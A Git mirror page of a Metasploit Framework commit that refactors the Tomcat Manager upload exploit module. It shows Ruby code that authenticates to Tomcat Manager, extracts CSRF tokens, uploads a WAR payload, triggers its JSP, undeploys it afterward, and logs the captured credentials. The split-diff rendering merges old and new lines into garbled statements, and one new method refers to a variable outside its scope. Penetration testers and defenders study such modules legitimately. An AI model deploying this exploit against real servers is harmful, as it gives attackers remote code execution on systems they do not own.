infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean exploit method

bug/bundler_fix
jvazquez-r7 2014-01-30 16:58:17 -06:00
parent 4458dc80a5
commit 9daacf8fb1
1 changed files with 87 additions and 47 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

118
modules/exploits/multi/http/tomcat_mgr_upload.rb
View File

@ -146,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Find the session ID and the CSRF token # Find the session ID and the CSRF token
# #
print_status("#{peer} - Retrieving session ID and CSRF token...") print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager? unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
@ -155,20 +154,8 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Upload Payload # Upload Payload
# #
print_status("#{peer} - Uploading and deploying #{@app_base}...")
war = war_payload if upload_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
print_status("Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
fail_with(Failure::Unknown, "Upload failed on #{upload_path} [No Response]") unless res
if res.code < 200 or res.code >= 300
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
fail_with(Failure::Unknown, "Upload failed on #{upload_path} [#{res.code} #{res.message}]")
end
report_auth_info( report_auth_info(
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -178,30 +165,21 @@ class Metasploit3 < Msf::Exploit::Remote
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true :active => true
) )
else
fail_with(Failure::Unknown, "Upload failed")
end
# #
# Execute Payload # Execute Payload
# #
print_status("#{peer} - Executing #{@app_base}...")
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
print_error("Execution failed on #{@app_base} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]")
vprint_status(res.body)
end end
# #
# Get the new CSRF token & session id # Get the new CSRF token & session id
# #
unless access_manager? unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end end
@ -209,15 +187,10 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Delete the deployed payload # Delete the deployed payload
# #
print_status("#{peer} - Undeploying #{@app_base} ...")
print_status("Undeploying #{@app_base} ...") unless undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy") print_warning("#{peer} - Failed to undeploy #{@app_base}...")
res = send_request_undeploy(undeploy_url)
print_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
end end
end end
def query_status def query_status
@ -307,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
def find_csrf(res = nil) def find_csrf(res = nil)
return "" if res.blank? return "" if res.blank?
print_status("Finding CSRF token...") vprint_status("#{peer} - Finding CSRF token...")
body = res.body body = res.body
@ -383,4 +356,71 @@ class Metasploit3 < Msf::Exploit::Remote
return true return true
end end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end end